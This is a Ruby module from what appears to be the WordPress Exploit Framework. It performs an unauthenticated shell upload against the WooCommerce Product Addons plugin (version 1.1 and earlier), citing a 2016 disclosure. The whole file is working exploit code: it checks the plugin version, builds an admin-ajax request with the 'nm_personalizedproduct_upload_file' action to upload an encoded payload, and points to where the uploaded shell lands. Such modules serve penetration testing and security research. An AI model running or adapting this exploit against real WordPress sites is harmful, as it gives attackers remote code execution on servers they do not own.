# frozen_string_literal: true

class Wpxf::Exploit::WoocommerceProductAddonsShellUpload < Wpxf::Module
  include Wpxf::WordPress::ShellUpload

  def initialize
    super

    update_info(
      name: 'WooCommerce Product Addons <= 1.1 Unauthenticated Shell Upload',
      author: [
        'White Fir Design', # Discovery and disclosure
        'rastating'         # WPXF module
      ],
      references: [
        ['WPVDB', '8630'],
        ['URL', 'https://www.pluginvulnerabilities.com/2016/09/19/arbitrary-file-upload-vulnerability-in-woocommerce-extra-fields/']
      ],
      date: 'Sep 19 2016'
    )
  end

  def check
    check_plugin_version_from_readme('woocommerce-product-addon', '2.0')
  end

  def uploader_url
    wordpress_url_admin_ajax
  end

  def payload_body_builder
    builder = Utility::BodyBuilder.new
    builder.add_field('action', 'nm_personalizedproduct_upload_file')
    builder.add_file_from_string('file', payload.encoded, payload_name)
    builder.add_field('name', payload_name)
    builder
  end

  def uploaded_payload_location
    normalize_uri(wordpress_url_uploads, 'product_files', payload_name.downcase)
  end
end
